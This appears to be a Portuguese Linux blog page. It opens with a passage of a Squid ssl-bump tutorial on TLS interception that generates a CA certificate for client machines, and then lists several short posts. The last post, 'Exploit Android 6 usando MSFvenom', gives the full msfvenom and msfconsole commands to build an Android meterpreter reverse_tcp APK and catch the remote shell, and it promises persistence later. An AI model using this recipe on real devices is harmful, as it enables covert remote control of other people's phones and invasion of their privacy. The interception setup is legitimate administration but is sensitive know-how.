Agora vamos da uma olhada nas seguintes linhas, as mesmas estão destacadas no squid.conf acima:

http_port 3128 ssl-bump \
cert=/etc/squid/certs/squid-ca-cert-key.pem \
generate-host-certificates=on dynamic_cert_mem_cache_size=16MB
https_port 3129 intercept ssl-bump \
cert=/etc/squid/certs/squid-ca-cert-key.pem \
generate-host-certificates=on dynamic_cert_mem_cache_size=16MB
sslcrtd_program /usr/libexec/security_file_certgen -s /var/lib/ssl_db -M 16MB

Elas definem o local onde iremos  armazenar o certificado que criaremos em seguida. Este certificado será usado para importarmos nas maquinas que terão o squid como proxy.

No caso acima, definimos esse diretorio como “/etc/squid/certs” e a ultima linha:
sslcrtd_program /usr/libexec/security_file_certgen -s /var/lib/ssl_db -M 16MB
Se refere ao local do banco de dados de certificados setados no squid.conf.
Com essa breve configuração e squid parado, vamos gerar os nossos certificados:
cd /etc/squid/certs

E, agora usando o openssl, geramos nossos dois arquivos; Um certificado e uma chave privada.

~#openssl req -new -newkey rsa:2048 -sha256 -days 365 -nodes -x509 -extensions v3_ca -keyout squid-ca-key.pem -out squid-ca-cert.pem

Vamos usar o cat para pegar o conteúdo dos dois arquivos e redirecionar para um outro, no caso o arquivo que conterá tanto o nosso certificado quanto nossa private key:
~# cat squid-ca-cert.pem squid-ca-key.pem >> squid-ca-cert-key.pem

O arquivo acima, em destaque é o que iremos transferir para as maquinas clientes do squid.
Vamos aproveitar e gerar/inicializar  a base de dados de certificados:
~# /usr/libexec/security_file_certgen -c -s /var/lib/ssl_db -M 16MB

Na antepenúltima e penúltima linha nós temos o seguinte:

cache_effective_user nobody
cache_effective_group nobody

Essas duas linhas acimas representam para o cache o usuario e grupo, ou seja, as permissões de usuario e grupo que serão utilizadas. Aproveitamos e atribuimos essas permissões para o diretorio do squid e tudo que nele tiver presente.
~# chow -R nobody:nobody /etc/squid
Desta forma estamos aplicando as permissões para que o squid funcione sem problemas

Outras permissões para outros diretorios podem ser necessarias, experimente rodar ~#squid -k parse, leia as informações de log e veja se suas permissões estão corretas, caso necessario, aplique as permissões para nobody e restarte o serviço.
Após estes passos, bem provavel que tudo funcione, mesmo que com alertas sobre as acls(crie as acls).

Bom pessoal, como o intuito era vermos a parte do ssl, acredito que o tutorial se alongou até demais. De qualquer forma, se ainda tiver duvidas, comente ai.

Referencias
-> https://elatov.github.io/2019/01/using-squid-to-proxy-ssl-sites/
-> https://wiki.squid-cache.org/Features/DynamicSslCert

RFC 1918
-> https://www.rfc-editor.org/rfc/rfc1918.html

QUICK-TIP: Saleae Logic, analisador lógico de baixo custo com suporte LINUX

By filipecoelho -
0

Olá pessoal hoje venho apresentar a vocês o saleae logic um analisador lógico de “baixo custo” com suporte para linux!

Continue

Ativando o MinimizeOnClick no Launcher do Ubuntu 16.04

By mikesd -
0

Olá pessoal.

Vou ensinar a vocês como ativar a opção de minimizar os aplicativos abertos no Launcher do unity. Lembrem-se que esta opção só funciona legal quando se tem uma única sessão do aplicativo aberta.

Em primeiro lugar, para conseguir habilitar esta opção, precisaremos de um app chamado unity-tweak-tool. Para instalar, executamos o comando:

sudo apt install unity-tweak-tool

OBS: Na versão 16.04 do Ubuntu, o comando “apt-get” foi “reduzido” para apenas “apt”, porém vai da sua preferência, todos os dois funcionam perfeitamente.

Feita a instalação do app, clicamos sobre o botão “Pesquisar no seu computador” ou simplesmente apertamos a tecla Super (não é Iniciar… rs) e procuramos pelo nome unity-tweak-tool, conforme print abaixo:

utt

Com o app aberto, clique na opção “Lançador”.

launcher

Na tela que se abriu, marque a flag “Minimize single window applications on click”.

moc

E o resultado será este…

unity-launcher

 

Pronto…! 😀

 

Fonte: OMG Ubuntu!

Configurando interface de rede no BeagleBone Green

By filipecoelho -
1

Ola galera! Hoje iremos começar algumas configurações básicas na nossa beaglebone green!

Para quem já tem a mesma sejam bem vindos! Para que não possui ainda visitem wiki da beaglebone e vejam o que essa incrível placa é capaz.

Continue

Instalando clientes de dynamic DNS no BEAGLEBONE GREEN

By filipecoelho -
0

Ola galera, hoje irei mostrar minha experiência na instalação de clientes de dynamic DNS(DDNS) no BBG.
O uso de um DDNS se torna uma boa ferramenta quando queremos acessar nossos servidores por um rede fora da local usando IPs públicos.

Continue

Exploit Android 6 usando MSFvenom (Kali 2.2016)

By Thiago Ferreira -
0

Gente, nesse video eu mostro como com poucos comandos você pode explorar um Android na versão 6.0.
O video não tem intenção de ensinar ou induzir ninguém a invadir a privacidade de terceiros, mas sim demonstrar que falhas podem ser exploradas.

Usei apenas o msfvenom sem opções de encoder, arquitetura ou outros, basicamente apenas um exploit gerado pelo kali e que me deu acesso de forma reversa ao Android.
Aparelho : Moto G segunda Geração com android 6.0 com ultima atualização de segurança instalado.

Comandos usado neste video…
Criar o exploit, substitua ip pelo seu ip, porta pela devida porta e de o nome do app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORTA -o app.apk

Para estabelecer conexão :
msfconsole

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost IP_KALI

set lport porta

exploit -j ou run ou somente exploit

Bom, por hoje é só, logo mais mostro como deixar este exploit como algo que inicia todas as vezes que o dispositivo for ligado, obtendo assim um acesso monstro ao Android….rsrs
abraços

 

 

 

POPULAR POSTS

POPULAR CATEGORY

©